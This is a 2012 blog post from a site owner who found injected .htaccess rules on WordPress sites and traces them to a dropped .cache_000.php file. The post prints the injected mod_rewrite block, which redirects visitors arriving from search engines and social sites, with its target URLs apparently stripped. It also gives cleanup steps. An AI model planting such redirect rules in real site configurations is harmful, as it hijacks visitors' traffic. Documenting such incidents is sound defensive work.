Wednesday, July 4, 2012

Sites Hacked? .htaccess files were code injected

(Previous Title: "Inmotion Hosting Hacked?")
At 7/3/2012 11:25:22 PM, my existing .htaccess files were injected with the following:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ [R=301,L]
ErrorDocument 400
ErrorDocument 401
ErrorDocument 403
ErrorDocument 404
ErrorDocument 500
I corrected the problem by removing the injected code from my existing files and deleting the one's that were added which I identified quickly as being 1.57 KB (1,608 bytes)

It may be related to a file called ".cache_000.php" injected via a vulnerability with Wordpress. Look in your /wp-content/uploads/ directory for .cache_000.php
For me the file had the same timestamp as some of the .htaccess files did.

I updated my title to un-point the finger at Inmotion Hosting... the problem does appear to be fixed since I deleted that file and updated Wordpress.

Update Wordpress or make the .cache_000.php file not accessible